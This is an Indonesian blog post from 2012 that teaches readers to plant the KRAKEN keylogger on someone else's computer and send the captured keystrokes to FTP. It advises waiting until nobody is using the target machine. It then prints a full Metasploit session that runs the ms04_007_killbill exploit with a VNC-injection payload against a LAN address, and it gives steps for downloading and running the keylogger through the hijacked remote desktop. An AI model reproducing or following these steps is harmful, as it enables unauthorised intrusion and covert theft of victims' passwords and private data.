Contoh cara memasang keylogger KRAKEN Yogyafree X-Code via jaringan

Minggu, 20 Mei 2012

Contoh cara memasang keylogger KRAKEN Yogyafree X-Code via jaringan

Jika anda menggunakan metasploit Framework untuk memanfaatkan meterpreter untuk mengaktifkan keylogger ditarget itu sudah biasa, anda dapat melihatnya di http://blog.xcode.or.id/?p=645, tapi bagaimana jika data hasil keylogger disimpan via FTP ? Anda dapat mencobanya dengan KRAKEN.
Pertama-tama pastikan tidak ada orang yang menggunakan komputer target,  setelah memastikan tidak ada, maka anda dapat masuk ke komputer target, contohnya diasumsikan komputer target mempunyai celah keamanan yang dapat di exploitasi dengan exploit killbill seperti dibawah ini  dengan payload windows/vncinject/bind_tcp.
_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
|/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 264 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 264 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf  exploit(ms04_007_killbill) > use exploit/windows/smb/ms04_007_killbill
msf  exploit(ms04_007_killbill) > set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf  exploit(ms04_007_killbill) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf  exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[-] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Sending stage (445440 bytes) to 192.168.1.34
[*] Starting local TCP relay on 127.0.0.1:5900…
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
Setelah masuk ke remote desktop via VNC anda dapat mendownload Keylogger KRAKEN disini melalui browser pada komputer target, jika komputer target tidak terkoneksi internet, maka anda dapat mengirimkan via jaringan.


Jika program membutuhkan MSCOMCTL.OCX maka anda dapat mendownloadnya di http://www.ocxdump.com/download-ocx-files_new.php/ocxfiles/M/MSCOMCTL.OCX/6.01.9782/download.html.
Saat KRAKEN berhasil dijalankan, tampilannya seperti berikut :











Untuk selanjutnya anda dapat masuk ke www.reza-creator.blogspot.com  untuk tutorial penggunaannya.
Oleh Reza Creator-Editoring

MY LINK FB CONTAC: dery.ketiga@yahoo.com






 

0 komentar:

Posting Komentar

Cari Blog Ini